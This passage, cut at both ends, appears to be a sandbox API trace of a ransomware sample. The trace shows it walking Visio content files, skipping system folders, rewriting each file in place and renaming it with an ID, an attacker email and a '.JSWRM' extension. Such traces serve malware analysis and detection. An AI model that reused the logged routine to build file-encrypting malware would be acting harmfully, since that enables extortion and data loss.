lpOverlapped=0x0) returned 1 [0148.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0148.008] CloseHandle (hObject=0x314) returned 1 [0148.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0148.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0148.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0148.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0148.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0148.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0148.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0148.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0148.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0148.008] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0148.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0148.009] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e340 [0148.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0148.009] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0148.009] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAPS_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemaps_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMAPS_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemaps_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e340 | out: hHeap=0x1e0000) returned 1 [0148.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0148.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0148.010] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1ba18c4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1ba18c4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1beddbb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xe28d, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEMECH_M.VSSX", cAlternateFileName="EEMECH~1.VSS")) returned 1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2=".") returned 1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="..") returned 1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="...") returned 1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="windows") returned -1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="recovery") returned -1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="perflogs") returned -1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="documents and settings") returned 1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="system volume information") returned -1 [0148.010] lstrcmpiW (lpString1="EEMECH_M.VSSX", lpString2="msocache") returned -1 [0148.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0148.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMECH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMECH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMECH_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0148.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0148.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMECH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMECH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMECH_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0148.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0148.010] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0148.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.010] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.010] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0148.010] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMECH_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemech_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.011] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=57997) returned 1 [0148.011] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe280) returned 0x27b348 [0148.012] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xe280, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xe280, lpOverlapped=0x0) returned 1 [0148.017] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.017] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xe280, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xe280, lpOverlapped=0x0) returned 1 [0148.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0148.018] CloseHandle (hObject=0x314) returned 1 [0148.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0148.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0148.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0148.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0148.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0148.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0148.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0148.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0148.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0148.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0148.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0148.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0148.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0148.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0148.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMECH_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemech_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMECH_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemech_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0148.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0148.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0148.019] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f81606, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f81606, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f81606, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd530, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEMECH_U.VSSX", cAlternateFileName="EEMECH~2.VSS")) returned 1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2=".") returned 1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="..") returned 1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="...") returned 1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="windows") returned -1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="recovery") returned -1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="perflogs") returned -1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="documents and settings") returned 1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="system volume information") returned -1 [0148.020] lstrcmpiW (lpString1="EEMECH_U.VSSX", lpString2="msocache") returned -1 [0148.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0148.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMECH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMECH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMECH_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0148.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0148.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMECH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEMECH_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEMECH_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0148.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0148.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0148.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.020] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0148.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMECH_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemech_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.021] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=54576) returned 1 [0148.021] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd530) returned 0x27b348 [0148.021] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd530, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xd530, lpOverlapped=0x0) returned 1 [0148.027] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.027] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd530, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xd530, lpOverlapped=0x0) returned 1 [0148.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0148.028] CloseHandle (hObject=0x314) returned 1 [0148.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0148.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0148.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0148.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0148.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0148.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0148.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0148.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0148.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0148.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0148.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0148.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0148.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0148.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0148.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMECH_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemech_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEMECH_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eemech_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0148.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0148.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0148.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0148.029] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a4a3b4, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1a4a3b4, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1a96a42, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15123, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="EEPATH_M.VSSX", cAlternateFileName="EEPATH~2.VSS")) returned 1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2=".") returned 1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="..") returned 1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="...") returned 1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="windows") returned -1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="recovery") returned -1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="perflogs") returned -1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="documents and settings") returned 1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="system volume information") returned -1 [0148.029] lstrcmpiW (lpString1="EEPATH_M.VSSX", lpString2="msocache") returned -1 [0148.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0148.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEPATH_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0148.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0148.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0148.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EEPATH_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EEPATH_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0148.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0148.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0148.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0148.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0148.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0148.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0148.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\EEPATH_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\eepath_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0148.032] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=86307) returned 1 [0148.032] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15120) returned 0x2501e8 [0148.032] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x15120, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x15120, lpOverlapped=0x0) returned 1 [0148.039] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.040] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x15120, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x15120, lpOverlapped=0x0) returned 1 [0148.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0148.041] CloseHandle (hObject=0x314) returned 1 [0148.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0148.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0148.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0148.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0148.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0148.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0148.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0148.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0148.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0148.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0148.041] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio 